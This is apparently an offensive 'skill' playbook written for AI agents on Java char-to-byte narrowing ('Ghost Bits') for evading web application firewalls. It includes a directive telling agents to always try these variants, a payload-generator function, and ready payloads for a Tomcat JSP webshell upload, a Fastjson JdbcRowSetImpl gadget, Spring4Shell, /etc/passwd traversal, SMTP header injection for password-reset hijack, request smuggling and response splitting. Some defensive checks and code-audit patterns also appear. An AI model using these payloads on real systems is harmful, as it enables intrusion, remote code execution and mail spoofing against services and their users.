ghost-bits-cast-attack

SKILL: Ghost Bits / Cast Attack — Java char to byte Narrowing Playbook


AI LOAD INSTRUCTION: This is a Java-only injection-enabling primitive, not a standalone vulnerability class. Whenever you see (1) a Java backend, (2) a WAF/IDS in front of it, and (3) any of {SQLi, deserialization RCE, file upload, path traversal, CRLF, request smuggling, SMTP injection} on the menu, ALWAYS try Ghost Bits variants of the payload before declaring it "blocked". The root cause is the silent loss of the high 8 bits when Java code narrows a 16-bit `char` to an 8-bit `byte`: the WAF sees a harmless Unicode character, while the backend reconstructs the original ASCII attack byte. Base models almost never reach for this primitive.
Source: Black Hat Asia 2026 talk "Cast Attack: A New Threat Posed by Ghost Bits in Java" by Xinyu Bai (@b1u3r), Zhihui Chen (@1ue), with contributor Zongzheng Zheng (@chun_springX).

0. RELATED ROUTING


Ghost Bits is a bypass primitive that re-enables payloads from many other playbooks. Pair it with whichever attack family applies:
  • waf-bypass-techniques: when a Java backend is suspected and WAF rules block the literal payload, this is the first technique to try beyond classic encoding.
  • deserialization-insecure: for Apache Commons BCEL ClassLoader and Fastjson `\u` / `\x` escape variants.
  • path-traversal-lfi: Spring, Jetty, Undertow, Vert.x URL decoding and `%2>` hex folding.
  • upload-insecure-files: Tomcat `RFC2231Utility` `filename*` Webshell upload.
  • request-smuggling: Apache HttpClient `<= 4.5.9` (HTTPCLIENT-1974/1978) header CRLF.
  • crlf-injection: Angus Mail / Jakarta Mail SMTP injection and JDK HttpServer response splitting.
  • sqli-sql-injection: Jackson `charToHex` table-lookup truncation hides SQL keywords inside Unicode escapes.

Advanced Reference


Load PAYLOAD_COOKBOOK.md when you need:
  • Full byte-to-Ghost-character lookup table covering every printable ASCII byte 0x20–0x7E and the most useful control bytes (0x00, 0x09, 0x0A, 0x0D).
  • Per-component affected version matrix and patch identifiers.
  • Yaklang and Python one-liner payload generators (for `poc.HTTP`, `codec.Encode`, raw socket).
  • "Multi-view normalization engine" pseudocode for blue-team WAF detection.


1. ONE-MINUTE MENTAL MODEL


Java's `char` is a 16-bit unsigned integer (a UTF-16 code unit). Almost every wire protocol (HTTP/1.1, SMTP, Redis RESP, file paths, raw byte streams) is 8-bit byte oriented. The right way to bridge them is explicit charset encoding:
// Correct: explicit UTF-8, multi-byte chars become multi-byte sequences
byte[] bytes = str.getBytes(StandardCharsets.UTF_8);
out.write(bytes);
Tons of legacy code, framework internals, and "fast path" optimizations skip this and silently narrow:
// Dangerous: high 8 bits silently dropped
byte b = (byte) ch;          // 0x966A -> 0x6A
out.write(ch);               // ByteArrayOutputStream.write(int) keeps low 8 bits
dos.writeBytes(str);         // DataOutputStream loops char->byte cast
int v = ch & 0xFF;           // explicit low-byte mask
The lost high 8 bits are the Ghost Bits. They turn a multi-byte Unicode character into a single attacker-chosen ASCII byte at the protocol layer.
View A (string layer: WAF / business validation / logs)
  sees: 陪 阮 严 灵 瘍 瘊 ...   "harmless Unicode garbage, allow"
                  |
                  v       silent narrowing somewhere in the call stack
View B (byte layer: protocol / file system / parser / class loader)
  sees: j  .  %  u  \r \n ...  "executes the dangerous semantics"

The boundary is breached at the exact moment "view A" and "view B" disagree.
Mathematical formulation: to make View B see byte `T`, pick any `k` in `0x01..0xFF` and use:
c = chr((k << 8) | T)
That gives you 255 candidate Unicode characters per dangerous byte (247 once the surrogate high bytes 0xD8..0xDF are excluded), which is plenty of room to dodge any signature-based blacklist.
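
The two views can be reproduced outside the JVM. The following is a minimal Python sketch, not Java code: `narrow` is a hypothetical helper that models a per-`char` `(byte)` cast by keeping the low byte of each UTF-16 code unit, and `ghost` restates the formula above.

```python
def narrow(text: str) -> bytes:
    """Model Java's per-char (byte) cast: keep the low byte of each UTF-16 code unit."""
    utf16 = text.encode("utf-16-be", errors="surrogatepass")
    return utf16[1::2]  # big-endian, so every second byte is a low byte


def ghost(target_byte: int, k: int) -> str:
    """The formula from the text: c = chr((k << 8) | T)."""
    return chr(((k & 0xFF) << 8) | (target_byte & 0xFF))


sample = "\u966a"                      # the character 陪
print(sample.encode("utf-8").hex())    # e999aa  (what a correct UTF-8 encoder emits)
print(narrow(sample))                  # b'j'    (what a narrowing writer emits)
print(narrow(ghost(0x2E, 0x96)))       # b'.'
```

The explicit UTF-8 path keeps all three bytes, while the narrowing path collapses the same character to a single ASCII byte. That gap is the View A / View B disagreement.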


2. THREE ROOT-CAUSE FAMILIES


The Ghost Bits umbrella covers three distinct underlying bugs. Distinguishing them tells you both which payload shape to send and what to grep for in source.

Family A — Real high-bit truncation (classic Ghost Bits)


The narrowing is literal and unconditional.
java
// Pattern A1: explicit cast
byte b = (byte) ch;

// Pattern A2: bitwise mask
int v = ch & 0xFF;
int v = ch & 255;

// Pattern A3: OutputStream.write(int) keeps low 8 bits only
out.write(ch);
baos.write(ch);

// Pattern A4: DataOutputStream.writeBytes(String) iterates chars,
//             writing low byte of each
dos.writeBytes(str);

// Pattern A5: deprecated APIs that still exist in old code
String.getBytes(int srcBegin, int srcEnd, byte[] dst, int dstBegin);
new StringBufferInputStream(str);
raf.writeBytes(str);
Typical impact: Tomcat `filename*`, Apache BCEL ClassLoader, Lettuce Redis writer, SMTP CRLF in Angus Mail, HTTPCLIENT-1974 header injection.

Family B — Bit-arithmetic folding (illegal char becomes legal)


A "fast" hex / base64 / charset decoder uses bit tricks instead of strict range checks, so an illegal character collapses onto a legal one.
java
// Jetty TypeUtil.fromHexDigit (simplified)
private static int fromHexDigit(char c) {
    int x = c & 0x1F;          // keep low 5 bits
    x += (c >> 6) * 25;
    x -= 16;
    return x;                  // expected 0..15, but no range check
}
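Worked example: feed `>` (0x3E):
0x3E & 0x1F = 0x1E = 30
(0x3E >> 6) * 25 = 0
30 + 0 - 16 = 14 = 0xE
So `%2>` is silently parsed as `%2E` = `.`. The same algebra maps the whole range `:` `;` `<` `=` `>` `?` (0x3A..0x3F) onto the hex values 10..15. Characters such as `^` and `~` evaluate to 39, which is outside 0..15, but a decoder without a range check still folds that value into an output byte.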
Typical impact: Openfire CVE-2023-32315, GeoServer CVE-2024-36401, generic URL-decode WAF bypass.
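
To see which characters fold onto which hex value, the arithmetic can be enumerated directly. This is a Python port of the simplified function shown above, written as a sketch; `aliases_by_value` and `lax_percent_decode` are illustrative helper names, not Jetty APIs.

```python
def from_hex_digit(code_unit: int) -> int:
    """Port of the simplified arithmetic: no range check on the result."""
    return (code_unit & 0x1F) + (code_unit >> 6) * 25 - 16


def aliases_by_value() -> dict:
    """Group printable ASCII characters by the hex value (0..15) they fold onto."""
    groups = {value: [] for value in range(16)}
    for code in range(0x20, 0x7F):
        value = from_hex_digit(code)
        if 0 <= value <= 15:
            groups[value].append(chr(code))
    return groups


def lax_percent_decode(hi: str, lo: str) -> int:
    """Combine two 'hex digits' the way an unchecked decoder would."""
    return from_hex_digit(ord(hi)) * 16 + from_hex_digit(ord(lo))


print(aliases_by_value()[14])              # ['>', 'E', 'e']
print(chr(lax_percent_decode("2", ">")))   # .
```

A strict decoder would accept only the last two entries of each group. The extra aliases are what a signature written for `%2E` / `%2e` misses.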

Family C — Lax Unicode normalization


The decoder accepts Unicode characters that happen to be classified as "digit" or that map to a hex value via a `& 0xFF` lookup, even though they were never meant to participate in protocol parsing.
java
// Fastjson: too permissive
Character.digit(c, 16);   // accepts Thai, Punjabi, fullwidth digits

// Jackson: index by low 8 bits into an ASCII-only table
return sHexValues[ch & 0xff];

// Generic: fullwidth normalization
// '２' (U+FF12) -> '2', 'ｅ' (U+FF45) -> 'e'
Typical impact: Fastjson `\u` and `\x` escape bypass, fullwidth URL-encoded path traversal, Jackson `charToHex` SQLi smuggling.
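
The contrast between a Unicode-aware digit lookup and a strict ASCII check can be sketched as follows. Python's `unicodedata.digit` stands in for the permissive classification only; it is not Java's `Character.digit`, and `strict_hex_value` is a hypothetical helper showing the kind of check a protocol parser would want instead.

```python
import unicodedata

ASCII_HEX = "0123456789abcdefABCDEF"


def strict_hex_value(ch: str) -> int:
    """Accept only a single ASCII hex digit; reject every other character."""
    if len(ch) != 1:
        raise ValueError("expected exactly one character")
    if ch not in ASCII_HEX:
        raise ValueError(f"not an ASCII hex digit: U+{ord(ch):04X}")
    return int(ch, 16)


# Fullwidth, Thai and Gurmukhi "four": all carry the Unicode digit value 4.
for ch in ("\uff14", "\u0e54", "\u0a6a"):
    print(f"U+{ord(ch):04X}", unicodedata.digit(ch))
```

Any validator that runs before the decoder has to agree with the decoder on which of these characters count as digits; the strict variant removes the ambiguity by refusing all of them.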


3. CHARACTER GENERATOR


Build any Ghost Bits character on the fly. This is the single function every agent should keep in mind:
```python
def ghost(target_byte: int, k: int = 1) -> str:
    """Return a Unicode char whose low 8 bits equal target_byte."""
    return chr(((k & 0xFF) << 8) | (target_byte & 0xFF))

# 255 candidates per byte, e.g. for '.' (0x2E):
candidates = [ghost(0x2E, k) for k in range(1, 256)]
# 阮 (U+962E), ..., etc.
```

```yak
// Yaklang (for poc.HTTP / fuzz)
func ghost(targetByte, k) {
    return string(rune(((k & 0xFF) << 8) | (targetByte & 0xFF)))
}
ghostJ = ghost(0x6A, 0x96)   // returns "陪"
```
Selection guidance:
  • Avoid the surrogate range `0xD800..0xDFFF` (high byte 0xD8..0xDF). Those are not valid scalar values and will be replaced by the JVM string decoder before reaching the narrowing site, defeating the bypass.
  • Prefer characters that survive the application's own charset round-trip (Latin-Extended, CJK Unified Ideographs, Enclosed CJK Letters and Months, Hangul). If the request body uses UTF-8, these all encode cleanly into multi-byte sequences that no WAF rule recognizes as `.`, `/`, `j`, etc.
  • Rotate `k` between requests so signature-based learning cannot pin a single character to a single attack.



4. DANGEROUS-BYTE TO GHOST-CHARACTER MAP


Compact red-team weaponization table. For every byte the attacker actually needs, one verified Unicode char is given; substitute another `k` if the WAF later learns the example.

| Target byte | Hex | Used for | Ghost char | Code point |
|---|---|---|---|---|
| `\t` | 0x09 | header folding, parser confusion | ĉ | U+0109 |
| `\n` | 0x0A | CRLF injection, log injection | 瘊 | U+760A |
| `\r` | 0x0D | CRLF injection, request smuggling | 瘍 | U+760D |
| (space) | 0x20 | header break, command separator | Ġ | U+0120 |
| `"` | 0x22 | string break in JSON / quoted-printable | Ģ | U+0122 |
| `%` | 0x25 | URL encoding prefix, second decode | 严 | U+4E25 |
| `&` | 0x26 | parameter separator | Ȧ | U+0226 |
| `'` | 0x27 | SQL string break | ȧ | U+0227 |
| `(` | 0x28 | EL/SpEL/OGNL syntax | Ȩ | U+0228 |
| `)` | 0x29 | EL/SpEL/OGNL syntax | ȩ | U+0229 |
| `.` | 0x2E | path traversal, extension | 阮 | U+962E |
| `/` | 0x2F | path separator | 丯 | U+4E2F |
| `0` | 0x30 | hex digit construction | 丰 | U+4E30 |
| `1` | 0x31 | hex digit construction | 失 | U+5931 |
| `2` | 0x32 | hex digit construction | 甲 | U+7532 |
| `3` | 0x33 | hex digit construction | 耳 | U+8033 |
| `;` | 0x3B | command separator, header continuation | Ȼ | U+023B |
| `<` | 0x3C | XSS / XML tag start | ȼ | U+023C |
| `=` | 0x3D | parameter / header value | Ƚ | U+023D |
| `>` | 0x3E | XSS / XML tag end | Ⱦ | U+023E |
| `@` | 0x40 | Fastjson `@type`, mail address | ŀ | U+0140 |
| `a` | 0x61 | keyword `class`, alphabet | ᙡ | U+1661 |
| `c` | 0x63 | keyword `class`, `cmd` | 㹣 | U+3E63 |
| `e` | 0x65 | hex digit | 来 | U+6765 |
| `j` | 0x6A | extension `.jsp` | 陪 | U+966A |
| `l` | 0x6C | keyword `class`, `closure` | ౬ | U+0C6C |
| `n` | 0x6E | keyword `Runtime`, `union` | 陮 | U+966E |
| `s` | 0x73 | keyword `class`, `select` | ⑳ | U+2473 |
| `t` | 0x74 | keyword `Runtime`, `type` | Ŵ | U+0174 |
| `u` | 0x75 | `\u` escape introducer | 灵 | U+7075 |
Workflow tip: keep the Latin Extended variants (`ŀ`, `ȧ`, `ȼ`, etc.) for tight HTTP header contexts, since each takes two UTF-8 bytes instead of the three a CJK character needs; use the CJK entries from the table when you want to bias the WAF "this is just text" classifier.
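
For the blue-team side of the same table, one possible check is to flag any non-Latin-1 code unit whose low byte lands on a sensitive ASCII byte. The sketch below is a heuristic under stated assumptions: `SENSITIVE_BYTES` is an illustrative subset chosen here (control and punctuation bytes only), and `ghost_candidates` is a hypothetical helper. Ordinary CJK text will produce false positives, so this is a triage signal rather than a verdict.

```python
# Illustrative subset of the table above; tune per protocol context.
SENSITIVE_BYTES = frozenset(b"\t\n\r \"%&'()./;<=>@")


def ghost_candidates(text: str, sensitive=SENSITIVE_BYTES) -> list:
    """Return (index, code point label, narrowed char) for suspicious UTF-16 code units."""
    units = text.encode("utf-16-be", errors="surrogatepass")
    hits = []
    for i in range(0, len(units), 2):
        high, low = units[i], units[i + 1]
        # high == 0 means the unit is already Latin-1 and narrows to itself.
        if high != 0 and low in sensitive:
            hits.append((i // 2, f"U+{(high << 8) | low:04X}", chr(low)))
    return hits


print(ghost_candidates("\u962e\u4e2fetc"))
# [(0, 'U+962E', '.'), (1, 'U+4E2F', '/')]
```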


5. PER-COMPONENT PAYLOAD RECIPES


Every recipe shows the dual view: what the WAF inspects vs. what the backend actually executes. This is the only reliable way to explain why the payload goes through.

5.1 Tomcat `RFC2231Utility`: file upload Webshell (Family A)


Trigger: any endpoint that accepts multipart upload where Tomcat parses `Content-Disposition: ... filename*=UTF-8''...`. Tomcat's RFC2231 decoder casts each non-percent character directly to byte, dropping the high 8 bits.
Payload:
Content-Disposition: attachment; filename*=UTF-8''1.陪sp

| Stage | Filename it sees |
|---|---|
| WAF / extension filter | `1.陪sp` (not `.jsp`, allow) |
| Tomcat RFC2231 decoder | `陪` -> low byte 0x6A -> `j` |
| File system | `1.jsp` |

Combine with the traversal characters from section 4 (the `.` and `/` rows) when the upload target directory is fixed but the application accepts a `filename*`.
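
A filter that wants to agree with the decoder has to inspect the narrowed view as well as the string view. The following Python sketch illustrates that idea only; `BLOCKED_EXTENSIONS`, `narrow`, and `is_blocked` are hypothetical names, and the low-byte model is an approximation of the cast described above rather than Tomcat's actual code.

```python
BLOCKED_EXTENSIONS = (".jsp", ".jspx")


def narrow(text: str) -> bytes:
    """Keep the low byte of each UTF-16 code unit, like a per-char (byte) cast."""
    return text.encode("utf-16-be", errors="surrogatepass")[1::2]


def is_blocked(filename: str) -> bool:
    """Check the extension on both the string view and the narrowed byte view."""
    string_view = filename.lower()
    byte_view = narrow(filename).decode("latin-1").lower()
    return string_view.endswith(BLOCKED_EXTENSIONS) or byte_view.endswith(BLOCKED_EXTENSIONS)


name = "1.\u966asp"                           # 1.陪sp
print(name.lower().endswith(BLOCKED_EXTENSIONS))  # False: string view alone passes
print(is_blocked(name))                           # True: byte view ends in .jsp
```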

5.2 Apache Commons BCEL — ClassLoader RCE (Family A)


Trigger: any sink that resolves a class name through `BCEL` (`$$BCEL$$...`) or any code that decodes BCEL via the `JavaReader` -> `ByteArrayOutputStream` loop.
Vulnerable shape:
java
ByteArrayOutputStream bos = new ByteArrayOutputStream();
JavaReader jr = new JavaReader(new CharArrayReader(userChars));
while ((ch = jr.read()) >= 0) {
    bos.write(ch);     // low 8 bits only
}
Attack: wrap each byte of the malicious BCEL bytecode into a Unicode character whose low 8 bits equal that byte. The decoded byte stream is a valid BCEL class; the WAF sees a long blob of CJK text with no recognizable class signatures.

| View | Content |
|---|---|
| WAF | `$$BCEL$$` followed by random-looking CJK |
| BCEL | standard BCEL class file bytes → JVM defineClass → RCE |

Defense for blue team: a WAF inspecting BCEL must replicate the `bos.write(ch)` semantics on each character before pattern matching.
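
The blue-team advice amounts to matching signatures against the low-byte view rather than the raw string. A minimal Python sketch of that normalization step follows; `low_byte_view` and `match_after_narrowing` are hypothetical helpers, and the pattern list is whatever signatures the inspector already uses.

```python
def low_byte_view(text: str) -> bytes:
    """Replicate write(int) semantics: keep only the low 8 bits of each UTF-16 code unit."""
    return text.encode("utf-16-be", errors="surrogatepass")[1::2]


def match_after_narrowing(text: str, patterns: list) -> list:
    """Return the byte patterns that appear once the text is narrowed."""
    view = low_byte_view(text)
    return [pattern for pattern in patterns if pattern in view]


# Build a test string whose characters all hide an ASCII byte in their low 8 bits.
disguised = "".join(chr(0x4E00 | byte) for byte in b"$$BCEL$$")
print("$$BCEL$$" in disguised)                          # False
print(match_after_narrowing(disguised, [b"$$BCEL$$"]))  # [b'$$BCEL$$']
```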

5.3 Jackson `charToHex`: SQLi smuggling (Family C)


Trigger: any Jackson-parsed JSON field whose value is later embedded in SQL or another parser. Jackson resolves `\uXXXX` digits via:
java
private static final int[] sHexValues = new int[256];   // must span every index that (ch & 0xFF) can produce
public static int charToHex(int ch) {
    return sHexValues[ch & 0xFF];   // mask first, lookup second
}
Any non-ASCII character whose low 8 bits land on a populated index returns that hex digit. The WAF sees gibberish; Jackson reconstructs an ASCII payload.
Payload (smuggle the digit `1` for a UNION column count):
json
{"q": "\u丰丰耳失 union select 1,2,3 -- "}

| View | Content |
|---|---|
| WAF | `\u丰丰耳失 union select ...` (no leading digit) |
| Jackson | `\u0031 union select 1,2,3-- ` -> `1 union select…` |

Pair with sqli-sql-injection for the downstream UNION / boolean / time-based payload templates.
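
The mask-then-lookup behaviour can be modelled with a 256-entry table. This Python sketch is a model of the pattern described above, not Jackson's source: `HEX_TABLE`, `char_to_hex_masked`, `char_to_hex_strict`, and `decode_u_escape` are hypothetical names, and the strict variant shows the range check that removes the ambiguity.

```python
HEX_TABLE = [-1] * 256
for value, digit in enumerate("0123456789"):
    HEX_TABLE[ord(digit)] = value
for offset in range(6):
    HEX_TABLE[ord("a") + offset] = 10 + offset
    HEX_TABLE[ord("A") + offset] = 10 + offset


def char_to_hex_masked(code_unit: int) -> int:
    """Mask first, look up second: any char with a matching low byte is accepted."""
    return HEX_TABLE[code_unit & 0xFF]


def char_to_hex_strict(code_unit: int) -> int:
    """Reject anything outside ASCII before touching the table."""
    return HEX_TABLE[code_unit] if code_unit < 128 else -1


def decode_u_escape(four_chars: str, lookup) -> str:
    """Decode the four digits of a \\uXXXX escape using the given digit lookup."""
    value = 0
    for ch in four_chars:
        digit = lookup(ord(ch))
        if digit < 0:
            raise ValueError(f"invalid hex digit U+{ord(ch):04X}")
        value = (value << 4) | digit
    return chr(value)


print(decode_u_escape("\u4e30\u4e30\u8033\u5931", char_to_hex_masked))  # 1
```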

5.4 Fastjson: `\u` and `\x` escape bypass (Families B + C)


Two independent surfaces:
(a) `\u` escape: `Character.digit(c, 16)` accepts Unicode digit categories beyond ASCII (Thai `๐-๙` U+0E50..U+0E59, Punjabi `੦-੯` U+0A66..U+0A6F, fullwidth `０-９` U+FF10..U+FF19).
json
{"\u4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}
WAF view: `\u4_type` (no `@type` literal). Fastjson normalizes fullwidth `４` to `4`, then handles `_` via the `\x` shortcut below, yielding `@type`.
(b) `\x` escape: Fastjson computes `digits[x1] * 16 + digits[x2]`. An illegal hex character returns the default value 0.
\x4_   ->   '4'(=4) * 16 + '_'(=0) = 0x40 = '@'
json
{"\x4_type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://x"}

| View | Field name |
|---|---|
| WAF | `\x4_type` (not `@type`) |
| Fastjson | `@type` -> JdbcRowSetImpl autotype gadget triggers |
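
The `\x` arithmetic is easy to check by hand. The sketch below models "illegal digit defaults to 0" with a dictionary lookup; it is an assumption-laden model of the formula quoted above, not Fastjson's implementation, and `decode_x_lax` / `decode_x_strict` are hypothetical names.

```python
HEX_DIGITS = {ch: int(ch, 16) for ch in "0123456789abcdefABCDEF"}


def decode_x_lax(x1: str, x2: str) -> str:
    """digits[x1] * 16 + digits[x2], with unknown characters silently treated as 0."""
    return chr(HEX_DIGITS.get(x1, 0) * 16 + HEX_DIGITS.get(x2, 0))


def decode_x_strict(x1: str, x2: str) -> str:
    """Same arithmetic, but refuse anything that is not an ASCII hex digit."""
    if x1 not in HEX_DIGITS or x2 not in HEX_DIGITS:
        raise ValueError(f"invalid \\x escape: {x1!r}{x2!r}")
    return chr(HEX_DIGITS[x1] * 16 + HEX_DIGITS[x2])


print(decode_x_lax("4", "_"))   # @
print(decode_x_lax("4", "0"))   # @
```

Under the lax rule, `\x4_` and `\x40` are indistinguishable after decoding, which is why a rule written for the canonical escape does not cover the variant.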

5.5 Spring / Jetty / Undertow / Vert.x — URL decoding (Families A + B)


Two combinable tricks:
Trick 1 — Family A character substitution in path or query:
/api/v1/data?file=阮阮丯阮阮丯etc丯passwd
                = ../../etc/passwd at the byte layer
Trick 2: Family B `%2>` folding when Jetty's `TypeUtil.fromHexDigit` is in the chain:
/setup/setup-s/%2>%2>/log.jsp
                = /setup/setup-s/../log.jsp after decode
Either alone bypasses most signature WAFs; combined they survive even "normalized then matched" rules that only see ASCII percent triplets.
Spring CVE-2025-41242 chain (`StringUtils.uriDecode` patched in PR #34673):
input :  阮严灵丰丰甲来
       (.)(%)(u)(0)(0)(2)(e)
narrow:  .%u002e
decode:  ..
result:  arbitrary file read via path traversal

| Stage | Path |
|---|---|
| Spring `isInvalidPath()` | `.%u002e`: no literal `..`, allow |
| Backend file resolution | `..` after `%u002e` decode → traversal |
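
The chain is an ordering problem: the check runs on a view that is two transformations away from what the file system receives. The Python sketch below walks the three stages under simplified assumptions; `narrow_to_text`, `decode_percent_u`, and `has_traversal` are hypothetical helpers that model the steps listed above and do not reproduce Spring's code.

```python
import re


def narrow_to_text(text: str) -> str:
    """Stage 1: keep the low byte of each UTF-16 code unit."""
    return text.encode("utf-16-be", errors="surrogatepass")[1::2].decode("latin-1")


def decode_percent_u(text: str) -> str:
    """Stage 2: resolve %uXXXX escapes (ASCII hex digits only)."""
    return re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def has_traversal(path: str) -> bool:
    """The naive check: look for a literal '..'."""
    return ".." in path


raw = "\u962e\u4e25\u7075\u4e30\u4e30\u7532\u6765"
stage1 = narrow_to_text(raw)
stage2 = decode_percent_u(stage1)
for label, value in (("input", raw), ("narrow", stage1), ("decode", stage2)):
    print(f"{label:7} traversal={has_traversal(value)}")
```

Only the final stage trips the check, so a validator is reliable only if it runs after every decoding step the backend will apply.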

5.6 Angus Mail / Jakarta Mail — SMTP injection (Family A)


Trigger: any application that builds SMTP envelopes or headers from user-controlled strings. Internal `ASCIIUtility` does:
java
byte b = (byte) ch;           // 16-bit char silently narrowed
Smuggle CRLF as `瘍瘊`:
hacker@evil.com瘍瘊Subject: Password reset code瘍瘊To: target@victim.com瘍瘊瘍瘊Your code is 1234

| View | What it parses |
|---|---|
| Application validation | a single `From` value containing odd CJK |
| SMTP server | five separate header lines + body, fully spoofed |

Real impact pattern: Jira-style (CVE-2025-57733) password-reset hijacking, Confluence domain allowlist bypass. Pair with crlf-injection for non-mail CRLF reuse.
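
On the application side, a header value can be rejected when its narrowed form would contain CR or LF, regardless of how it looks as a string. The following is a defensive Python sketch under the low-byte model used throughout this document; `require_safe_header_value` is a hypothetical helper, not part of any mail library.

```python
def require_safe_header_value(value: str) -> str:
    """Raise if the value contains CR/LF literally or after low-byte narrowing."""
    narrowed = value.encode("utf-16-be", errors="surrogatepass")[1::2]
    if b"\r" in narrowed or b"\n" in narrowed:
        raise ValueError("header value would contain CR or LF at the byte layer")
    return value


print(require_safe_header_value("user@example.com"))
try:
    require_safe_header_value("hacker@evil.com\u760d\u760aSubject: spoofed")
except ValueError as exc:
    print("rejected:", exc)
```

Because ASCII characters narrow to themselves, the same check also covers a literal `\r\n`.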

5.7 Apache HttpClient `<= 4.5.9`: request smuggling (Family A)


HTTPCLIENT-1974 / HTTPCLIENT-1978: header values pass through `OutputStreamWriter` plus a narrow-cast write that emits raw `\r\n` for `\u760D\u760A`.
X-Auth-Token: 1瘍瘊POST /admin HTTP/1.1\r\nHost: internal\r\nContent-Length: 0\r\n\r\nGET /public HTTP/1.1

| Hop | Sees |
|---|---|
| Front proxy / WAF | one request with a long `X-Auth-Token` |
| Origin | two requests; the second is an admin POST |

Cross-reference request-smuggling for chosen-prefix attacks once the desync is confirmed.

5.8 JDK HttpServer — response splitting (CVE-2026-21933, Family A)


Reflection of user input into a response header passes through `com.sun.net.httpserver` writers that low-byte-cast each char.
Payload (URL parameter or upstream header):
Custom: Cu瘍瘊Content-Type: text/html瘍瘊Content-Length: 33瘍瘊瘍瘊<script>alert(1)</script>
Server emits two logical responses; the second carries an attacker-chosen body. Escalates to stored XSS, cache poisoning, and SSO redirect chains.

5.9 Other affected components


Same Family A primitive, different sink:
  • Lettuce (Redis client): command injection by smuggling `\r\n` into RESP frames; chain to arbitrary `CONFIG SET dir` + `SAVE` for SSRF-to-RCE.
  • Jodd `FileNameUtil`: path traversal via Ghost variants of `.` and `/`, because its internal write loop narrows.
  • XMLWriter: tag-name injection when an attribute or text node value is pushed through a low-byte writer; XXE / XSS pivot.
  • ActiveJ HTTP: CRLF injection identical in shape to 5.7 / 5.8.
  • Vert.x HTTP body parser: Family A in `MultipartParser`.
See PAYLOAD_COOKBOOK.md for affected-version matrix and full per-component payload skeletons.


6. KNOWN-CVE BYPASS RECIPES


Use these exactly when the corresponding CVE is patched but a WAF still fronts the service. Each Payload below shifts the original ASCII attack into a form that survives string-based WAF rules.

Openfire CVE-2023-32315 — auth bypass (Family B)


Original public bypass:
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp
Ghost Bits / `%2>` folding bypass (much harder to signature):
GET /setup/setup-s/%2>%2>/%2>%2>/log.jsp
Each `%2>` collapses through Jetty's lax hex into `%2E` = `.`, yielding the same `../../` traversal without ever emitting `..` or `%2e` to the WAF.

GeoServer CVE-2024-36401: RCE via `Runtime` keyword (Family B)


Public WAF rules typically block `Runtime`. Inject one folded character:
Ru%6>time
Decoder math: `%6>` -> `%6E` -> `n`. The expression evaluator now sees `Runtime`; the WAF never did.

Spring4Shell CVE-2022-22965 — class loader chain (Family A)


Required parameter prefix `class.module.classLoader...`. WAFs block the literal `class`. Substitute via low-byte chars:
Content-Disposition: form-data; name*="㹣౬ᙡ⑳⑳.module.classLoader.resources..."

| Component | Char | Code point | Low byte |
|---|---|---|---|
| `c` | 㹣 | U+3E63 | 0x63 |
| `l` | ౬ | U+0C6C | 0x6C |
| `a` | ᙡ | U+1661 | 0x61 |
| `s` | ⑳ | U+2473 | 0x73 |
| `s` | ⑳ | U+2473 | 0x73 |

Spring's parameter-name resolver narrows back to `class`.

Spring CVE-2025-41242 — arbitrary file read (Family A + Family B mix)


Already demonstrated in 5.5 above. Payload `阮严灵丰丰甲来` -> `.%u002e` -> `..` once decoding runs after validation.

Jakarta Mail CVE-2025-57733 — Jira-style mail hijack (Family A)


to=victim@org.com瘍瘊Subject: Reset code瘍瘊To: attacker@evil.com瘍瘊瘍瘊Your code is 1234
The mail leaves the company SMTP server with valid SPF / DKIM / DMARC, but its `To:` and `Subject:` are attacker-chosen, which makes for high-fidelity phishing.


7. DETECTION DECISION TREE


Use this when triaging a target. The point is to avoid Ghost Bits when it cannot help and to always try it when the preconditions hold.
Is the backend Java? (Server header, error page, JSESSIONID, .do/.action,
                      WebGoat-style stack trace, X-Powered-By, X-Frame-Options
                      with Tomcat default values)
├── No  -> stop, Ghost Bits does not apply
└── Yes
    ├── Is there a WAF / IDS or input filter blocking your literal payload?
    │   ├── No  -> use the literal payload; Ghost Bits is overkill
    │   └── Yes -> continue
    ├── Which sink are you targeting?
    │   ├── File upload via multipart  -> recipe 5.1 (Tomcat filename*)
    │   ├── JSON deserialization       -> recipes 5.3 (Jackson) / 5.4 (Fastjson)
    │   ├── Class loader / BCEL ref    -> recipe 5.2
    │   ├── URL path / parameter       -> recipe 5.5 + Family B `%2>`
    │   ├── Header reflection          -> recipes 5.7 / 5.8
    │   ├── Mail send                  -> recipe 5.6
    │   └── Redis / RESP / XML / RPC   -> recipe 5.9
    ├── Probe with a single non-destructive substitution first
    │   (replace ONE character with its Ghost variant; observe response
    │    diff: status code, length, header echo, error message, time)
    └── If observable difference appears -> escalate by substituting all
                                            blocked characters and chain
                                            through the linked playbook.


8. SAST / CODE-AUDIT SIGNATURES


Three priority tiers when reviewing Java source. Search across all your project repos, all dependencies you can shade, and the `lib/` of any deployed appliance.

Tier 1 — direct narrowing (Family A)


\(byte\)\s*\w+
&\s*0[xX][fF][fF]
&\s*255
\.write\(\s*[a-zA-Z_]\w*\s*\)         # OutputStream.write(int)
writeBytes\s*\(
StringBufferInputStream
String\.getBytes\s*\(\s*int
RandomAccessFile.*writeBytes
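
The Tier 1 patterns can be applied line by line with a few lines of Python. This is a rough triage sketch, assuming the source is available as text; the pattern names and `scan_java_source` are hypothetical, and regex hits are leads for manual review, not confirmed findings.

```python
import re

# Names are illustrative labels; the regexes are the Tier 1 patterns listed above.
TIER1_PATTERNS = {
    "cast": re.compile(r"\(byte\)\s*\w+"),
    "mask_hex": re.compile(r"&\s*0[xX][fF][fF]"),
    "mask_dec": re.compile(r"&\s*255"),
    "write_int": re.compile(r"\.write\(\s*[a-zA-Z_]\w*\s*\)"),
    "write_bytes": re.compile(r"writeBytes\s*\("),
    "sbis": re.compile(r"StringBufferInputStream"),
    "getbytes_int": re.compile(r"String\.getBytes\s*\(\s*int"),
    "raf_write_bytes": re.compile(r"RandomAccessFile.*writeBytes"),
}


def scan_java_source(source: str) -> list:
    """Return (line number, pattern name, stripped line) for every Tier 1 hit."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in TIER1_PATTERNS.items():
            if pattern.search(line):
                findings.append((line_no, name, line.strip()))
    return findings


sample = "byte b = (byte) ch;\nint v = ch & 0xFF;\nout.write(ch);\nString s = \"ok\";\n"
for finding in scan_java_source(sample):
    print(finding)
```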

Tier 2 — lax hex / digit decoding (Families B + C)


Character\.digit\s*\(
